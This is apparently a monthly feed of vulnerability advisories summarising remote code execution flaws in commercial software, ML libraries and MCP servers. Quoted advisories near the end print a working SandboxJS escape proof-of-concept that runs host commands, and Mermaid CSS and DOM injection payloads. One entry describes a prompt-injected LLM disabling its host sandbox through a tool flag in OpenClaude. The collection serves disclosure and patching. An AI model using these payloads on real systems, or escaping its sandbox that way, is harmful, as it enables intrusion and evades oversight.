RCE
Monthly
Illustrator versions 29.8.6, 30.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Painter versions 12.0.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Painter versions 12.0.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Illustrator versions 29.8.6, 30.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
After Effects versions 26.0, 25.6.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
After Effects versions 26.0, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
After Effects versions 26.0, 25.6.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Media Encoder versions 26.0.2, 25.6.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Media Encoder versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.
Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.
Improper access control for some Intel Vision software for all versions within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable remote code execution. This result may potentially occur via network access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (low) and availability (low) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.
Buffer overflow for the Intel(R) Data Center Graphics Driver for VMware ESXi software before version 2.0.2 within Ring 1: Device Drivers may allow an escalation of privilege. System software adversary with a privileged user combined with a low complexity attack may enable local code execution. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (high) impacts.
Integer overflow in the UEFI firmware for the Slim Bootloader may allow an escalation of privilege. System software adversary with a privileged user combined with a low complexity attack may enable local code execution. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (high) impacts.
Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).
Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).
Code injection in protobufjs-cli's pbjs static generator allows attackers who control protocol buffer schemas to inject malicious JavaScript code into generated output files. The vulnerability affects npm packages protobufjs-cli versions ≤1.2.0 and 2.0.0-2.0.1, with patches released in versions 1.2.1 and 2.0.2. Exploitation requires low complexity with authenticated network access and user interaction (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C), achieving high confidentiality and integrity impact but no availability impact. No CISA KEV listing or public exploit code identified at time of analysis, though GitHub advisory confirms the vulnerability with released patches.
Denial of service in protobufjs allows remote attackers to crash runtime code generation by providing crafted protobuf schemas or JSON descriptors containing unescaped control characters in field names. When affected message types perform encode, decode, verify, or conversion operations, the generated JavaScript code fails to compile, rendering those types unusable. This affects applications that load untrusted schemas; those using only application-defined schemas are not impacted. No code execution is known to occur.
Remote code execution in protobufjs (npm package) versions ≤7.5.5 and 8.0.0-8.0.1 allows attackers to inject and execute arbitrary JavaScript by supplying a malicious protobuf schema with crafted default values in bytes fields. When applications load untrusted protobuf descriptors and call toObject() with defaults enabled, attacker-controlled expressions are emitted into generated conversion functions and executed in the application context. Vendor-released patches are available in versions 7.5.6 and 8.0.2. No public exploit code identified at time of analysis, though the vulnerability is straightforward to weaponize given the clear preconditions in the advisory.
Prototype injection in protobufjs generated message constructors allows attackers controlling plain objects passed to message constructors to modify the prototype chain of individual message instances via an enumerable `__proto__` property. Affects protobufjs versions 7.5.5 and earlier, and 8.0.0-8.0.1. This is a per-instance prototype pollution issue (not global) with impact dependent on downstream application behavior such as inherited property reliance or `instanceof` checks. No active exploitation confirmed; no public exploit identified at time of analysis.
Prototype pollution in protobuf.js type lookup tables enables remote code execution via code injection into generated encode/decode functions. Affects npm package protobuf.js versions ≤7.5.5 and 8.0.0-8.0.1. Exploitation requires chaining with a separate prototype pollution vulnerability-applications must first allow Object.prototype pollution, then invoke protobufjs code generation on attacker-influenced schemas. Vendor-released patches available (v7.5.6, v8.0.2). CVSS 8.1 (High) reflects network vector but high attack complexity (AC:H) due to multi-step prerequisite. No evidence of active exploitation (not in CISA KEV), public exploit code not identified at time of analysis.
Prototype pollution in protobufjs allows denial of service through corrupted JavaScript built-ins when parsing untrusted schemas. Attackers who control protobuf schemas or JSON descriptors can write to inherited object properties on global constructors, causing process-wide state corruption that persists until restart. CVSS 7.5 (High) with network vector and no authentication required, but real-world risk is limited to applications parsing schemas from untrusted sources-applications only decoding untrusted message payloads with trusted schemas are not affected. Vendor-released patches available: v7.5.6 and v8.0.2. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
SQL injection in Ivanti Endpoint Manager web console enables authenticated remote attackers to execute arbitrary code on the server. Affects all versions prior to 2024 SU6. Attack requires only low-privilege authenticated access (CVSS PR:L) with low complexity (AC:L), making exploitation straightforward for any authenticated user. Ivanti has released patched version 2024 SU6 per vendor advisory dated May 2026. No CISA KEV listing or public exploit code identified at time of analysis, indicating exploitation not yet confirmed in the wild despite high severity score.
Remote code execution in Ivanti Virtual Traffic Manager allows authenticated administrators to execute arbitrary OS commands via command injection. Affects all versions before 22.9r4. Attack requires network access and administrative credentials but has low complexity (CVSS AC:L). No active exploitation confirmed at time of analysis, though administrative access requirement significantly limits attack surface compared to unauthenticated RCE vulnerabilities.
A remote code execution vulnerability exists in Code Runner MCP Server when run with the --transport http option, which exposes the /mcp JSON-RPC endpoint without authentication on port 3088. An unauthenticated remote attacker can invoke the run-code MCP tool to supply arbitrary source code and execute it via child_process.exec() using the specified language interpreter. This allows execution of arbitrary code with the privileges of the user running the server. This vulnerability has not been fixed and might affect the project in all versions.
Command injection in Siemens RUGGEDCOM ROX industrial network devices enables authenticated remote attackers to execute arbitrary commands with root privileges during feature key installation. The vulnerability affects multiple ROX product lines (MX5000, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, RX5000) running firmware versions below V2.17.1. While exploitation requires low-level authentication and higher attack complexity (CVSS 4.0: AV:N/AC:H/PR:L), successful exploitation grants complete control over critical industrial network infrastructure. No public exploit identified at time of analysis, and EPSS data not available for this recently disclosed vulnerability.
Unauthenticated remote code execution in GWD Connect WordPress plugin versions up to 2.9 allows attackers to execute arbitrary PHP code on unregistered installations via the update_agent action in standalone agent endpoints (gwd-backup.php and gwd-logs.php) when the API key is not configured. The vulnerability exploits a missing authorization check that occurs only when the authentication key has not been set up, affecting default installations. No public exploit code or active exploitation has been confirmed at this time.
Improper input validation in an Axis OS configuration file allows authenticated SSH users to execute code and potentially escalate privileges. The vulnerability requires valid SSH credentials but affects all Axis OS versions, making it a significant risk for organizations running Axis network devices with SSH access exposed or shared credentials.
Code injection in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform allows authenticated attackers to execute arbitrary code for subscribed channel users by sending specially crafted inputs. The vulnerability has low integrity impact with no confidentiality or availability consequences. CVSS 4.3 (low severity) reflects the requirement for authenticated access, but the ability to affect other users elevates practical risk in multi-tenant environments.
Arbitrary server-side code execution in SAP Commerce Cloud via unauthenticated malicious configuration upload and code injection. Attackers can remotely exploit a misconfigured Spring Security framework to upload crafted configuration files and inject code without authentication, requiring only that a user interact with malicious content (CVSS:3.1/AV:N/AC:L/PR:N/UI:R). The vulnerability affects SAP Commerce Cloud Configuration with critical impact across confidentiality, integrity, and availability. No public exploit code or CISA KEV listing identified at time of analysis, though EPSS data unavailable. Patch details available in SAP Security Note 3733064.
Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.
Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.
Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.
Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.
Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.
An arbitrary file upload vulnerability in MK-Auth 23.01K4.9 allows attackers to execute arbitrary code via uploading a crafted PHP file. Rated high severity (CVSS 8.0), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.
Remote code execution in Kubectl MCP Server v1.1.1 allows unauthenticated network attackers to execute arbitrary commands on systems running the vulnerable server through crafted HTML-based exploitation vectors. Despite a critical 9.8 CVSS score, EPSS rates exploitation likelihood at only 0.02% (4th percentile), suggesting limited real-world targeting thus far. The vulnerability is classified as CWE-94 (Code Injection), affecting an open-source Model Context Protocol (MCP) server implementation for Kubernetes management. No CISA KEV listing indicates absence of confirmed widespread exploitation at time of analysis.
Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.
Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.
The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.
Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.
Remote code execution in TinyZero's HDFS utilities allows unauthenticated attackers to execute arbitrary OS commands via crafted file paths passed through the Hydra configuration framework. The vulnerability stems from unsanitized user input directly interpolated into os.system() shell commands within the _copy() function, affecting all deployments through commit 6652a63c57fa. No active exploitation confirmed at time of analysis, but EPSS score of 0.14% (33rd percentile) suggests below-average likelihood despite CVSS:9.8 critical rating. The attack requires network access to the TinyZero training process and ability to control path parameters via configuration.
Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.
Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.
Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.
Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.
Remote code execution in Guardrails AI through version 0.6.7 occurs when installing validator packages via the Hub mechanism. The guardrails hub install command dynamically executes post-installation scripts from Hub manifests without validating the script path or content, allowing attackers who publish malicious packages to achieve arbitrary code execution on victim systems during package installation. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS (18th percentile), this represents a supply chain attack requiring user-initiated installation rather than widespread automated exploitation. No active exploitation confirmed (not in CISA KEV), and patch availability not confirmed from available data.
Remote code execution in Horovod distributed training framework (versions through 0.28.1) allows unauthenticated network attackers to execute arbitrary code on worker nodes by injecting malicious pickle payloads into the KVStore HTTP server. The vulnerability combines unauthenticated write access to the KVStore coordination server with unsafe deserialization using cloudpickle.loads(), enabling trivial exploitation against any reachable Horovod cluster. EPSS score of 0.12% (31st percentile) suggests low widespread exploitation probability despite critical CVSS 9.8 rating, and no active exploitation confirmed (not in CISA KEV). Public exploit development is highly feasible given the straightforward attack path and publicly documented details.
Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.
Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.
Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.
Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.
Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.
Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.
Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.
barebox version prior to 2026.04.0 contains multiple memory-safety vulnerabilities in the EFI PE loader in efi/loader/pe.c where integer overflow in virtual image size computation using 32-bit arithmetic on section VirtualAddress and size values allows undersized heap allocation, and PE section loading logic fails to validate that PointerToRawData plus copied size remains within the PE file buffer. An attacker can supply a malicious EFI PE binary via TFTP, USB, SD card, or network boot to trigger heap buffer overflow or out-of-bounds read from heap memory, potentially achieving code execution in bootloader context.
libcaca is a colour ASCII art library. In 0.99.beta20 and earlier, an integer overflow vulnerability in libcaca's canvas import functionality allows an attacker to cause a controlled heap out-of-bounds write (heap overflow) by supplying a crafted file in the "caca" format. Depending on the build configuration and memory allocator, this may lead to memory corruption or remote code execution. This is the same vulnerability as CVE-2021-3410 but the fix at that time was not fully correct. Commit fb77acff9ba6bb01d53940da34fb10f20b156a23 fixes this vulnerability.
Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, the Outline comment section permits users to mention other users; however, the backend does not validate or sanitize the href attribute associated with these mentions. As a result, potentially dangerous protocols (e.g., javascript:) are not filtered, introducing a risk of client-side code execution. This vulnerability is fixed in 1.7.0.
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to execute arbitrary code with kernel privileges.
### Summary Sandbox-defined functions expose `Function.caller`, allowing sandboxed code to recover the internal `LispType.Call` runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript. ### Details In [executorUtils.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/executorUtils.ts#L239-L282) `createFunction()` constructs normal host JS functions, and because these are ordinary host functions, sandbox code can observe: ```js function f(){ return f.caller } ``` That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal `LispType.Call` op, which is registered in [call.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L16-L17). The leaked callback accepts a **params** object from the attacker and uses its fields without any authentication checks. if you looked at those branches [call.ts:47](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L47-L55), [call.ts:70](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L70), [call.ts:149](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L149-L153). This means the attacker controls `obj.context`, `obj.prop`, `obj.get`, `context.evals.get` and `a`. This can lead to direct invocation of an internal primitive with forged operands ### PoC ```js const sandb = require('@nyariv/sandboxjs').default; const sand = new sandb(); const payload = ` const callOp = (function fn() { return fn.caller; })(); function makeContext(capture = () => {}) { return { ctx: { options: 0 }, evals: { get: capture } }; } function leakStatic(obj, prop) { let leaked; callOp({ done() {}, a() {}, b: [], obj: { context: obj, prop, get() {} }, context: makeContext((fn) => (leaked = fn, () => 1)) }); return leaked; } function callDirect(fn, args) { let value; callOp({ done(_, result) { value = result; }, a() {}, b: args, obj: fn, context: makeContext() }); return value; } callDirect(leakStatic(Object, 'defineProperty'), [ leakStatic, 'call', callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [ callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]), 'constructor' ]) ]); let hostFn; callOp({ done(_, result) { hostFn = result; }, a: leakStatic, b: [], obj: { context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()', get() {} }, context: makeContext() }); return hostFn(); `; console.log(sand.compile(payload)().run()); ``` ### Impact _Sandbox escape leads to RCE_
### Impact Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and `altFontFamily` configuration options. Live demo: [mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg) Example code: ``` %%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%% flowchart LR A --> B ``` The injected CSS exploits stylis's `&` (scope reference) handling. `:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles to all page elements. Global at-rules (`@font-face`, `@keyframes`, `@counter-style`) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS `:has()` selectors. ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)) ### Workarounds If you can't upgrade mermaid, you can set the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this. ### Credits Reported by @zsxsoft on behalf of @KeenSecurityLab
### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. #### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Credits Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.
